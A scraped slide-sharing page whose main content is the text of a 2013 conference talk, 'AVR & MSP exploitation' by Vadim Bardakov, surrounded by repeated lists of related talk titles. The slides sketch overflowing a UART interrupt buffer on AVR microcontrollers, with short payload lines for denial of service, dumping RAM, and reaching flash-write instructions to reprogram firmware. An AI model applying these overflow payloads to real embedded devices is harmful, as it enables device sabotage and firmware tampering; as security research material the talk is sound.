Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
Webinar: Plataforma Renesas Synergy – Construindo sua aplicação MQTT com anal...
 
SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4SDS_SSL_MPM_UN_A4
SDS_SSL_MPM_UN_A4
 
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
Yokogawa & NextNine – Lessons Learned: Global Cybersecurity Management System...
 
SIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنزSIMATIC manager سيماتك منجر سيمنز
SIMATIC manager سيماتك منجر سيمنز
 
S emb t10-development
S emb t10-developmentS emb t10-development
S emb t10-development
 
Redes
RedesRedes
Redes
 
What's New with ATTACK for ICS?
What's New with ATTACK for ICS?What's New with ATTACK for ICS?
What's New with ATTACK for ICS?
 
Efficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive FirmwareEfficient Reverse Engineering of Automotive Firmware
Efficient Reverse Engineering of Automotive Firmware
 
Virtualization & Network Connectivity
Virtualization & Network Connectivity Virtualization & Network Connectivity
Virtualization & Network Connectivity
 
Migrating to the 7200 controller george anderson marcus christensen
Migrating to the 7200 controller george anderson marcus christensenMigrating to the 7200 controller george anderson marcus christensen
Migrating to the 7200 controller george anderson marcus christensen
 
BMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
BMCArmor: A Hardware Protection Scheme for Bare-metal CloudsBMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
BMCArmor: A Hardware Protection Scheme for Bare-metal Clouds
 
Introduction to Embedded Systems
Introduction to Embedded SystemsIntroduction to Embedded Systems
Introduction to Embedded Systems
 
2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals2012 ah vegas remote networking fundamentals
2012 ah vegas remote networking fundamentals
 
Manual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21xManual del sistema del controlador programable S7-200 CPU21x
Manual del sistema del controlador programable S7-200 CPU21x
 
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
44CON 2014 - Stupid PCIe Tricks, Joe Fitzpatrick
 
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systemsDefcon 22-cesar-cerrudo-hacking-traffic-control-systems
Defcon 22-cesar-cerrudo-hacking-traffic-control-systems
 
Air vision ds
Air vision dsAir vision ds
Air vision ds
 

Mais de DefconRussia

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...DefconRussia
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...DefconRussia
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobindingDefconRussia
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/LinuxDefconRussia
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangDefconRussia
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC DefconRussia
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneDefconRussia
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...DefconRussia
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринDefconRussia
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23DefconRussia
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20DefconRussia
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20DefconRussia
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20DefconRussia
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20DefconRussia
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23DefconRussia
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23DefconRussia
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23DefconRussia
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...DefconRussia
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхDefconRussia
 

Mais de DefconRussia (20)

[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
[Defcon Russia #29] Борис Савков - Bare-metal programming на примере Raspber...
 
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
[Defcon Russia #29] Александр Ермолов - Safeguarding rootkits: Intel Boot Gua...
 
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding[Defcon Russia #29] Алексей Тюрин - Spring autobinding
[Defcon Russia #29] Алексей Тюрин - Spring autobinding
 
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
[Defcon Russia #29] Михаил Клементьев - Обнаружение руткитов в GNU/Linux
 
Георгий Зайцев - Reversing golang
Георгий Зайцев - Reversing golangГеоргий Зайцев - Reversing golang
Георгий Зайцев - Reversing golang
 
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC [DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
[DCG 25] Александр Большев - Never Trust Your Inputs or How To Fool an ADC
 
Cisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-oneCisco IOS shellcode: All-in-one
Cisco IOS shellcode: All-in-one
 
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
Олег Купреев - Обзор и демонстрация нюансов и трюков из области беспроводных ...
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Attacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей ТюринAttacks on tacacs - Алексей Тюрин
Attacks on tacacs - Алексей Тюрин
 
Weakpass - defcon russia 23
Weakpass - defcon russia 23Weakpass - defcon russia 23
Weakpass - defcon russia 23
 
nosymbols - defcon russia 20
nosymbols - defcon russia 20nosymbols - defcon russia 20
nosymbols - defcon russia 20
 
static - defcon russia 20
static - defcon russia 20static - defcon russia 20
static - defcon russia 20
 
Zn task - defcon russia 20
Zn task - defcon russia 20Zn task - defcon russia 20
Zn task - defcon russia 20
 
Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20Vm ware fuzzing - defcon russia 20
Vm ware fuzzing - defcon russia 20
 
Nedospasov defcon russia 23
Nedospasov defcon russia 23Nedospasov defcon russia 23
Nedospasov defcon russia 23
 
Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23Advanced cfg bypass on adobe flash player 18 defcon russia 23
Advanced cfg bypass on adobe flash player 18 defcon russia 23
 
Miasm defcon russia 23
Miasm defcon russia 23Miasm defcon russia 23
Miasm defcon russia 23
 
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
Andrey Belenko, Alexey Troshichev - Внутреннее устройство и безопасность iClo...
 
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условияхSergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
Sergey Belov - Покажите нам Impact! Доказываем угрозу в сложных условиях
 

Último

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii SoldatenkoFwdays
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyAlfredo García Lavilla
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 

Último (20)

"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Commit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easyCommit 2024 - Secret Management made easy
Commit 2024 - Secret Management made easy
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 

Vadim Bardakov - AVR & MSP exploitation

  • 1. AVR & MSP exploitation Vadim Bardakov Security Researcher Digital Security (ERPScan)
  • 2. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices © 2002—2013, Digital Security 2
  • 3. AVR & MSP exploitation Why now? • Inc. usage of uC • Nobody cares about code security for these devices • Inc. amount of easily accessible data channels • Microcontroller firmware can be retrieved © 2002—2013, Digital Security 3
  • 4. AVR & MSP exploitation Jokes © 2002—2013, Digital Security 4
  • 5. AVR & MSP exploitation What if it works? © 2002—2013, Digital Security 5
  • 6. AVR & MSP exploitation Oops… © 2002—2013, Digital Security 6
  • 7. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis © 2002—2013, Digital Security 7
  • 8. AVR & MSP exploitation Firmware extraction Side channel attacks • Power analysis • Planarization • etc. © 2002—2013, Digital Security 8
  • 9. AVR & MSP exploitation Firmware extraction MSP430: • FRAM • 5xx • 6xx © 2002—2013, Digital Security 9
  • 10. AVR & MSP exploitation RAM MSP © 2002—2013, Digital Security AVR 10
  • 11. AVR & MSP exploitation RAM General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 11
  • 12. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security 12
  • 13. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers SP Additional I/O registers Internal RAM © 2002—2013, Digital Security ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 13
  • 14. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security Additional I/O registers Internal RAM SP ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 14
  • 15. AVR & MSP exploitation Stack errors General purpose registers SP Interrupt handler: UART Timers Comparators INT0..X © 2002—2013, Digital Security I/O Special Function Registers Additional I/O registers Internal RAM ffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff ffffffffffffffffffffffff 15
  • 16. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 16
  • 17. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 17
  • 18. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 18
  • 19. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Lost control I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 00000000000000 19
  • 20. AVR & MSP exploitation Stack errors General purpose registers Reconfiguring peripheral devices…. Seems OK I/O Special Function Registers Additional I/O registers Internal RAM © 2002—2013, Digital Security SP ffff 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20202020202020 20
  • 21. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Unknown offset Global Variables Internal RAM © 2002—2013, Digital Security 21
  • 22. AVR & MSP exploitation Stack errors General purpose registers I/O Special Function Registers Additional I/O registers Bypassing checks © 2002—2013, Digital Security Internal RAM 22
  • 23. AVR & MSP exploitation Buffer overflow Access: • Local variables • Return address: • Compiler-generated instructions • Interruption • Bootloader © 2002—2013, Digital Security 23
  • 24. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } Casual for UART handlers © 2002—2013, Digital Security 24
  • 25. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xB . “x010xFC”xN Atmel Studio 6.1 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 25
  • 26. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 © 2002—2013, Digital Security 26
  • 27. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } print “xff”xN 000001FB CLI 000001FC RJMP PC-0x0000 DoS © 2002—2013, Digital Security 27
  • 28. AVR & MSP exploitation Buffer overflow ISR(UART0_RECEIVE_INTERRUPT) { UART_RxHead++; UART_RxBuf[UART_RxHead] = UART0_DATA; } void uart_puts(const char *s ) { while (*s) uart_putc(*s++); print “xff”xB . “x010xFC”xN. P uart_puts(p); 000001C8 LDD R24,Y+1 000001CA LDD R25, Y+2 000001CB CALL 0x0000014E Load indirect with displacement Load immediate Call subroutine Dumping RAM } © 2002—2013, Digital Security 28
  • 29. AVR & MSP exploitation Reprogramming © 2002—2013, Digital Security 29
  • 30. AVR & MSP exploitation Reprogramming Open-source bootloaders sucks in production. © 2002—2013, Digital Security 30
  • 31. AVR & MSP exploitation Reprogramming Load code to RAM print “xff”xB . “x000x16”xN. ROPTail Interruption handler Ideal for ROP © 2002—2013, Digital Security 31
  • 32. AVR & MSP exploitation Reprogramming Gain control to SPM print Code . “x000xFC”xN. P Atmex +00000343: 95E8 …. +00000351: 95E8 SPM Store program memory SPM Store program memory Writing code to FLASH © 2002—2013, Digital Security 32
  • 33. AVR & MSP exploitation Sum • Simple attacks can be conducted blindly • Different consequences: • DoS • Modifying device configuration • etc. © 2002—2013, Digital Security 33
  • 34. Digital Security in Moscow: +7 (495) 223-07-86 Digital Security in Saint Petersburg: +7 (812) 703-15-47 www.dsec.ru www.erpscan.com v.bardakov@dsec.ru © 2002—2013, Digital Security 34